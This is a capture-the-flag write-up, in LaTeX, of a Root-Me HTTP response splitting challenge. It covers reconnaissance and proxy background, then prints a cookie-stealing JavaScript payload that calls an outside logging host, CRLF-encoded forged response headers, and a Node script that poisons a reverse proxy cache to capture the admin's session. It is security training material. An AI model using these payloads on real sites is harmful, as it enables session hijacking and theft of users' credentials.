rootme_http-response-splitting/report/chapters/challenge.tex

\section{Challenge}
\label{sec:challenge}

\subsection{Starting point}
\label{subsec:starting}

The Root-Me web page gives some information about the vulnerable website. We know three things:
\begin{itemize}
    \item A reverse proxy cache has been installed
    \item The website is still under development
    \item The administrator connects him/herself very often
\end{itemize}

Those information gives us several leads. First of all, we know that we can dig into the operations of a reverse proxy in order to find out potential weaknesses or vulnerabilities. Then, if the website is under development, there can be some files, resources or accesses than are not supposed to be available on the website or the server. By the way, a website should not be reachable on the Internet when not finished. Lastly, if the administrator logs in several times a day, we could try to dig out some clues about sessions or the server cache.

Here is the base address of the vulnerable website:
\begin{center}
\url{http://challenge01.root-me.org:58002/home}
\end{center}

The \gls{ip_address} behind this Web server is \texttt{2001:bc8:35b0:c166::151}. It is placed on the \texttt{58002} port of the target machine.

Here is a preview of the home page:
\newimage{0.7}{ch_page_home.png}{Home page of the website}{ch_page_home}

We can see that the page has a link to an administration page. If we try to access to this page, we obtain a \texttt{401} \gls{http} error code:

\newimage{0.7}{ch_page_admin.png}{Restrained admin page of the website}{ch_page_admin}

The first thing I saw was that the web server do not use any secured transport protocol, such as \gls{tls}. This is a really bad practice, but it can help us in our research of vulnerabilities.

At the first visit on the website, a page asks us which language we want to choose. Depending on our choice, a \gls{http} \textit{GET} parameter is given to the web server (i.e. \texttt{user/param?lang=fr}).

\newimage{0.7}{ch_page_lang.png}{Language choice page of the website}{ch_page_lang}

This page is shown if no \gls{cookie} defining the language is stored on the client browser.

\subsection{Technological Background}
\label{subsec:background}

Based on the first contact, we will here explain the various technologies used for the website.

\subsubsection{Used languages}

The website is built using basic \gls{html}. There is no \gls{javascript} nor \gls{css} used. We can confirm this by opening the \textit{Network} tab of our browser's console when requesting the pages.

\newimage{1}{ch_console_network.png}{List of the returned Web documents}{ch_console_network}

The admin page is alone too, but returned with the \texttt{401} error code\footnote{\url{https://en.wikipedia.org/wiki/List_of_HTTP_status_codes}} \textit{Forbidden}.

Beside the website resources, its pages do not contain any line of code other than \gls{html}.

It limits the possibilities of attack vectors, but a \gls{javascript} code can always be injected into the website by many vectors.

\subsubsection{\Gls{cookie} usage}

By opening the browser console, we can see that two \gls{cookie}s are defined by the website. One of them defines the chosen language, the second one gives the identifier of the user session.

\newimage{1}{ch_cookies.png}{\Gls{cookie}s defined}{ch_cookies}

A nice lead would be to try to steal the administrator's session identifier stored in the corresponding \gls{cookie}.

\subsubsection{Reverse Proxy}

As mentioned at the beginning of this section, we know that this website is using a reverse proxy. Basically, a proxy is a server that acts as an intermediary between two hosts in order to hide clients. Typically, it intercepts all requests made to a server by the client and forward them to this server as if it made the initial request. It also receives and forwards the server's responses to the client. A proxy is located at the application layer of the \gls{osi} model\footnote{\url{https://en.wikipedia.org/wiki/OSI_model}}. This kind of proxies is also called \textit{forward proxies}.

This intermediary permits to hide the initial origin, the client one, of requests. It can also authorize a client to access to some resource, a network or servers. It can provide various services, such as:
\begin{itemize}
    \item Increasing the privacy of the client
    \item Additional security
    \item Traffic sniffing
    \item Limitation of the access to local or global resources
    \item To avoid network restrictions
\end{itemize}

\newimage{0.6}{ch_proxy_forward.png}{Explanation of a forward proxy}{ch_proxy_forward}

Note: a proxy can be used by one or several clients. It then acts as one virtual client for each real client.

More specialized, a reverse proxy is a server installed in front of one or several Web servers. It acts again as an intermediary between clients and servers by intercepting traffic, but its goal is to avoid direct communication to one or several origin servers. The client has therefore the impression to only communicate with the proxy, when it can receive answers from several servers. Using this kind of proxies, we can map one \gls{ip_address} with different ports to many servers.

\newpage

\newimage{0.8}{ch_proxy_reverse.png}{Explanation of a reverse proxy}{ch_proxy_reverse}

Note: a proxy can be used by one or several clients. It then acts as one virtual client for each real client.

Its services can be:
\begin{itemize}
    \item Add protections against attacks
    \item Load balancing
    \item Add a secured transmission (by \gls{tls} or other protocols)
    \item \textbf{Implement a caching capability}
\end{itemize}

As explained by the challenge, the proxy used by the website is meant to add a caching capability. It implies that we never speak directly to the Web server, but to the proxy.

\subsubsection{Server checks}

We will now use several tools in order to collect as much information as we can.

First of all, we used the \textit{Nessus} scanner\footnote{\url{https://www.tenable.com/products/nessus}} in order to get a complete overview of the host. We wanted to get information about the operating system, the opened ports or the potential vulnerabilities. An advanced scan has been launched on the host, including all \gls{tcp} ports. Here are our main finding:
\begin{itemize}
    \item There is 57 opened and responding \gls{tcp} ports. Some of them are used for the \gls{ssh}, \gls{smtp} or \gls{http} protocols, others are just opened.
    \item Some banners, corresponding of the fingerprint of services, have been found. But nothing for the \texttt{58002} port.
    \item The host is running the Linux Kernel version 2.6
    \item Some web servers are using \textit{nginx} \footnote{\url{https://nginx.com/}}. The one one the \texttt{58002} port is using \textit{WorldCompanyWebServer}.
    \item Python is running on two other ports.
    \item The reverse proxy has been detected, but without its version
    \item The \gls{http} \textit{Options allowed} header is not implemented on the \texttt{58002} port.
    \item Only the \textit{GET} \gls{http} method is allowed on the \texttt{58002} port.
    \item The \gls{smtp} server allow mail relaying.
\end{itemize}

For now, we do not think that the other ports are useful for the resolution of the challenge. They are used for other challenges of the \textit{Root-Me} platform.

Then, we used \textit{nmap}\footnote{\url{https://nmap.org/}} in order to detect the machine version, the enumeration of available services and their version. This could be helpful for further researches. We did not find any additional information. Nmap thinks that the device is an \textit{Apple} phone, which is highly unlikely.

\begin{lstlisting}[language=bash, caption=One of the used nmap command]
  $ nmap -6 2001:bc8:35b0:c166::151 -A -Pn -p 58002
\end{lstlisting}

\subsubsection{\gls{http} check}
\label{subsubsec:ch_http_check}

After the general scan, we launched a Web-specialized scan on the \texttt{58002} port. We also used \textit{Nessus}. Here are our major findings:

\begin{itemize}
    \item Some \gls{cgi} scripts may not be correctly and securely sanitized, which could let us executing arbitrary \gls{html} code into the clients' browser
    \item Some \gls{cgi}s can be vulnerable to header injections. A proxy cache poisoning is therefore possible.
    \item Strings can be passed into \gls{cgi}s parameters and they could be read back in the response.
    \item The \gls{cookie}s are not marked \textit{Secure} nor \textit{HttpOnly}, so they are sent on non-encrypted lines and can be read by malicious client-side scripts.
    \item No \gls{csp} policy is defined, so cross-site scripting is possible.
    \item No \textit{X-Frame-Options} \gls{http} header is defined in the responses, so click-jacking attacks are possible.
\end{itemize}

\subsubsection{\gls{cgi}}

We saw at the \ref{subsec:starting} subsection that some \gls{http} \textit{GET} parameters are given to the Web server then choosing a language. Based on the results of the \textit{Nessus} scan, we now know that those inputs are vulnerable to header injections. We are now aware that we can use this entry point to perform an injection.

\subsubsection{Final thought}

The main vectors that we can deduct are that the \gls{cgi} capability is not secured, neither the server's \gls{http} configuration. Some code could be injected into the proxy by one of those two weaknesses in order to be processed by another person directly in his/her browser. Our major lead here is to try to seal the administrator session by using such injection.

\subsection{Direction}

Based on our previous discoveries, we do not have a lot of information about the machine itself. But we now know that the \gls{http} headers are vulnerable, by the \gls{cgi} interface. The payload that we will be using will not be specific to an operating system, but based on weaknesses on the \gls{http} protocol and the server scripting system itself. We do not depend on a specific software version nor an application version.

\subsubsection{Payload}

Because we are working in a Web environment, we can use a malicious \gls{javascript} code. After a few researches on the Web, we found out how to build an efficient payload for this purpose: we have to retrieve the stored \gls{cookie}s of the website and log them as \gls{http} \textit{GET} parameters on a website we control. We can then read the \gls{cookie}s in the request that our target made.

\begin{lstlisting}[language=JavaScript, caption=Malicious payload]
const interceptor = "https://httpreq.com/throbbing-cake-4l8suii2/record";
let cookies = document.cookie;
location.replace(interceptor + "?" + cookies);
\end{lstlisting}

We use the free and online service named \textit{http://req}\footnote{\url{https://httpreq.com/}} that we used for another project. Because we do not have any controlled Web server, this tool lets us consult all connections made to a specific endpoint, with the details of the request. All parameters can be seen this way.

Here is a test made from a \textit{Wikipedia} page, by copy-pasting the above code in the browser's console: we saw that all unprotected \gls{cookie}s, like the ones defined on the challenge's Web server, are communicated to the page. The unprotected \gls{cookie}s are the one that can be read by \gls{javascript} codes (\gls{http} header \textit{httpOnly}) and not protected by an encryption protocol (\gls{http} header \textit{Secure}). This is also the case of our \gls{cookie}s on the challenge's website.

\newimage{1}{ch_example.png}{Example of the payload}{ch_example}

\subsubsection{\gls{http} request splitting}

The main subject of this challenge is the splitting of a \gls{http} response. We saw on \ref{subsubsec:ch_http_check} the lack of \gls{http} security mechanisms, so we can try to inject our payload directly in the request. Based on the corresponding Wikipedia page\footnote{\url{https://en.wikipedia.org/wiki/HTTP_response_splitting}}, we tried to escape the \gls{http} headers of a request made on the challenge Web page.

We used the \textit{ZAP} proxy\footnote{\url{https://www.zaproxy.org/}} in order to capture all traffic between our computer and the reverse proxy. This let us modify the headers of the requests before sending them to the server.

After a few researches, we found a website\footnote{\url{https://www.netsparker.com/blog/web-security/crlf-http-header/}} that describe the approach for escaping the scope of \gls{http} headers, by the \gls{crlf} characters. Each line of a request defines a header, and are split by those end-of-line characters (CR and LF). By adding such characters at the end of the \textit{GET} method as parameters, we can take control of the page content. So we adapted the payload we defined earlier and tried to inject it into a request.

By splitting the headers, we have to redefine basic and mandatory \gls{http} headers in order to send a valid request. Then, at the end of those headers, we can add our payload. We used the corresponding \gls{rfc}\footnote{\url{https://tools.ietf.org/html/rfc2616}} in order to find those headers.

\begin{itemize}
    \item \textbf{\%0D\%0A}: the end-of-line characters for escaping a header
    \item \textbf{HTTP/1.1 200 OK}: to define the protocol and its version
    \item \textbf{Host: challenge01.root-me.org:58002}: to define the initial host
    \item \textbf{Last-Modified: date}: to give the timestamp, something after the real timestamp in order to be cached by the reverse proxy
    \item \textbf{Content-Type: text/html}: to indicate the format of the requested page
    \item \textbf{Content-Length: size}: to give the size of the page, which is the size of the payload
    \item \textbf{payload}: Finally, the payload that must be included into \texttt{script} \gls{html} tags to be interpreted by the browser
\end{itemize}

All those items must then be chained between each others, and spaces must be indicated by the \texttt{\%20} string.

\begin{lstlisting}[caption=\gls{http} headers written manually]
&%0D%0AHTTP/1.1%20200%2OK%0D%0AHost:%20challenge01.root-me.org:58002%0D%0ALast-Modified:%20Tue,%2027%20Oct%202020%2020:46:59%20GMT%0D%0AContent-Type:%20text/html%0D%0AContent-Length:%20112
\end{lstlisting}

We have to specify the size of the \gls{http} response's body. For this, we found the size of the payload by reading the \texttt{.length} property on a new \gls{javascript} variable, that include the \texttt{<script>} tags and the complete payload without nested variables. This is easier to get the payload size this way.

\begin{lstlisting}[caption=New \gls{javascript} variable for the payload]
let payload = '<script>location.replace("https://httpreq.com/throbbing-cake-4l8suii2/record" + "?" + document.cookie);</script>';
\end{lstlisting}

\newpage

Now, we just have to add the content of the payload variable as a string to the end of the \gls{http} headers. Warning: do not forget to replace the special characters by the one supported by the \gls{http} protocol (i.e: \%20 instead of a space). For this, we used the \textit{URLEncoder}\footnote{\url{https://www.urlencoder.io/}} online tool. A complete specification of those characters is available online\footnote{\url{https://www.html.am/reference/html-special-characters.cfm}}.

\begin{lstlisting}[caption=Final \gls{http} headers payload]
&%0D%0AHTTP/1.1%20200%2OK%0D%0AHost:%20challenge01.root-me.org:58002%0D%0ALast-Modified:%20Tue,%2027%20Oct%202020%2020:46:59%20GMT%0D%0AContent-Type:%20text/html%0D%0AContent-Length:%20112%0D%0A%0D%0A%27%3Cscript%3Elocation.replace%28%22https%3A%2F%2Fhttpreq.com%2Fthrobbing-cake-4l8suii2%2Frecord%22%20%2B%20%22%3F%22%20%2B%20document.cookie%29%3B%3C%2Fscript%3E%27
\end{lstlisting}

We then tried to inject this complete payload to our target, but we ran into a few problems. First of all, we did not think that we had to include two end-of-lines at the end of the \gls{http} \textit{GET} parameters and just in front of the body. This is defined by the protocol norms. Otherwise, the request is not valid.

Then, we tried this on the \texttt{/home} endpoint, but we forgot that we have to visit \texttt{/user/param} in order to enable the \gls{cgi} processing.

We also made a typo in the \gls{http} response code: we typed a \texttt{O} instead of a \texttt{0} for the \texttt{200 OK} part.

Finally, we had to remove the extra \texttt{'} characters at the start and at the end of the content of the payload (the \%27 string). It defined the scope of the \gls{javascript} string, but it is no longer required there and we forgot them.

\begin{lstlisting}[caption=Corrected final HTTP content]
%0D%0A%0D%0AHTTP/1.1%20200%20OK%0D%0AHost:%20challenge01.root-me.org:58002%0D%0ALast-Modified:%20Tue,%2017%20Nov%202020%2020:46:59%20GMT%0D%0AContent-Type:%20text/html%0D%0AContent-Length:%20112%0D%0A%0D%0A%3Cscript%3Elocation.replace%28%22https%3A%2F%2Fhttpreq.com%2Fthrobbing-cake-4l8suii2%2Frecord%22%20%2B%20%22%3F%22%20%2B%20document.cookie%29%3B%3C%2Fscript%3E
\end{lstlisting}

\subsubsection{Injection demonstration}

For the demonstration, we enabled a breakpoint on \textit{ZAP} in order to catch each request made to the challenge's Web server. When we visit the Web site from a fresh start, without any \gls{cookie}, we intercept the request when selecting the language and add the payload after the language parameter in the \gls{url}. Then, we can see that the request contains the normalized payload in its body, and redirects to the home page by a \texttt{302} \gls{http} code, which means that a redirection is made to another page (\texttt{/home}). The client then sends a request to get the home page, that the server sends with the headers and the body defined by the payload and injected in the previous exchange.

\begin{figure}[!htb]
   \begin{minipage}{0.5\textwidth}
     \centering
     \includegraphics[width=0.95\linewidth]{ch_demo_req1.png}
   \end{minipage}\hfill
   \begin{minipage}{0.5\textwidth}
     \centering
     \includegraphics[width=0.95\linewidth]{ch_demo_res1.png}
   \end{minipage}
   \caption{Demonstration of injection, initial request and response}
   \label{fig:ch_demo_1}
\end{figure}

\begin{figure}[!htb]
   \begin{minipage}{0.5\textwidth}
     \centering
     \includegraphics[width=0.95\linewidth]{ch_demo_req2.png}
   \end{minipage}\hfill
   \begin{minipage}{0.5\textwidth}
     \centering
     \includegraphics[width=0.95\linewidth]{ch_demo_res2.png}
   \end{minipage}
   \caption{Demonstration of injection, second request and response}
   \label{fig:ch_demo_2}
\end{figure}

We have two exchanges because after that the language has been set because the Web server redirects to the home page. As explained in the \textit{MDN Documentation}\footnote{\url{https://developer.mozilla.org/en-US/docs/Web/HTTP/Status/302}} of \textit{Mozilla}, the body is not changed at the second exchange when a new request is made for a new page. So we succeeded to perform the injection even with a redirection.

\subsubsection{Cache poisoning}

Now that the payload is ready, we have to inject it on the reverse proxy acting like a cache. For this, we need to discover a way to do that. The objective of this attack is to send a request poisoned with a malicious payload that gets stocked in the cache and delivered to other users.

First, we tried to poison the cache of the home page, but we realized that we never receive the \gls{cookie} of the administrator. We think that she/he only visits the administration page. So, we tried to poison the cache of the admin page, but there is no \textit{GET} parameters passing by \gls{cgi} that can be interpreted in this endpoint: the payload can therefore not be interpreted.

We searched a lot of alternatives in order to inject the malicious code to the administration page. We searched for new \textit{GET} parameters that we could use as vectors, but we did not found anything. We also tried various ways to inject the code by \gls{url} manipulations, but no trial worked.

We finally documented ourselves about \gls{crlf} injection and \textit{\gls{http} Response Splitting}. We have clarified the inner operations when doing such attacks. The first request generates two responses from the web server, the second one being fully controlled by the attacker. Then, by launching a second request, it is matched by the server to the second HTTP response that we control. It means that the server thinks that the resource requested by the second request is the requested one we injected in the first request defining the payload. So, instead of just launching the first request on the server and wait, we need to perform a second request on the server. And in our case, we need to ask for the administration page. Therefore, the administrator will execute our payload when accessing to his/her page because the cache would have a hit to the administrator request and will deliver the cache response, controlled by us.

\newimage{1}{ch_injection.png}{Schema of the cache poisoning}{ch_injection}

The \texttt{302} redirection made after the initial request is not considered in this kind of attack, because the server is in control of this exchange: it said that an additional request must be done on another resource. This is why our payload is not served for such requests. We did not inclused this exchange in the figure \ref{fig:ch_injection} for lisibility purpose.

\newpage

\subsection{The attack}

To launch the attack, we decided to create a small \textit{Node}\footnote{\url{https://nodejs.org/}} application, which is \gls{javascript} scripts running in a context without any browser. We are used to work with this technology, hence our choice. We imported the \textit{axios}\footnote{\url{https://github.com/axios/axios}} library in order to perform the \gls{http} requests.

For the initial request, the one having the payload, we need to be sure that it will be stored in the cache. For this need, we used the \gls{http} header \textit{Pragma}\footnote{\url{https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/Pragma}} to ensure that the request is submitted to the Web server before releasing an eventual cached copy. This header replaces the basic one \textit{Cache-Control}, but is also compatible with \gls{http} version 1.0 and is better handled by \textit{axios}.

Then, we defined a timestamp in the future in the \textit{Last-Modified} \gls{http} header to be sure that the cache can store it, because it becomes valid and relevant for the proxy.

Using \gls{javascript}'s \textit{Promise} mechanism (used to bring synchronous capabilities to our code), we made two requests: one for the payload injection and one for the cache poisoning on the admin page.

We had to include one \gls{cookie} defining a user session, otherwise the server do not react correctly to our requests. We took one generated by the server when visiting the Web site normally with a browser.

\newpage

\begin{lstlisting}[caption=Node application running our attack]
/*  -------------------------------
    ---       IMPORTS           ---
    ------------------------------- */

const axios = require('axios').default;


/*  -------------------------------
    ---          DATA           ---
    ------------------------------- */

const BASE_URL = "http://challenge01.root-me.org:58002/";

const PAYLOAD = "%0D%0A%0D%0AHTTP/1.1%20200%20OK%0D%0AHost:%20challenge01.root-me.org:58002%0D%0ALast-Modified:%20Tue,%2017%20Nov%202020%2020:46:59%20GMT%0D%0AContent-Type:%20text/html%0D%0AContent-Length:%20112%0D%0A%0D%0A%3Cscript%3Elocation.replace%28%22https%3A%2F%2Fhttpreq.com%2Fthrobbing-cake-4l8suii2%2Frecord%22%20%2B%20%22%3F%22%20%2B%20document.cookie%29%3B%3C%2Fscript%3E"

let cookie = "ebbbd859-1dce-438f-9b9e-46b895fcb169";

const USER_COOKIE = "user_session=" + cookie;


/*  -------------------------------
    ---         PROCESS         ---
    ------------------------------- */

// Launching initial request to the website for code injection
axios.get(BASE_URL + 'user/param?lang=fr' + PAYLOAD, {
  headers: {
              Cookie: USER_COOKIE,
              Pragma: "no-cache"
  }
}).then(function (response) {
    console.log("Payload injected successfully to the base web page.");

    // Start second fetch to poison right uk-icon-page
    axios.get(BASE_URL + 'admin', {
      headers: {
        Cookie: USER_COOKIE
      }
    }).then(function (response) {
        console.log("Admin page visited successfully.");
    }).catch(function (error) {
      console.log("An error occured while visiting admin page.");
    });
}).catch(function (error) {
    console.log("An error occured while injecting payload.");
});

\end{lstlisting}

\newpage

When executing this attack, we have this output:

\newimage{0.6}{ch_attack_console.png}{Output of the attack on the console}{ch_attack_console}

And, by waiting a few minutes for the bot to visit the admin page, we retrieved the administrator \gls{cookie} that contains her/his session identifier, thanks to the \textit{http://req} platform.

\newimage{1}{ch_attack_cookie.png}{\Gls{cookie} of the administrator}{ch_attack_cookie}

This session identifier being the key of the \textit{Root-Me} challenge, the challenge is now validated!

\newimage{0.5}{ch_validation.png}{Validation of the \textit{Root-Me} challenge}{ch_validation}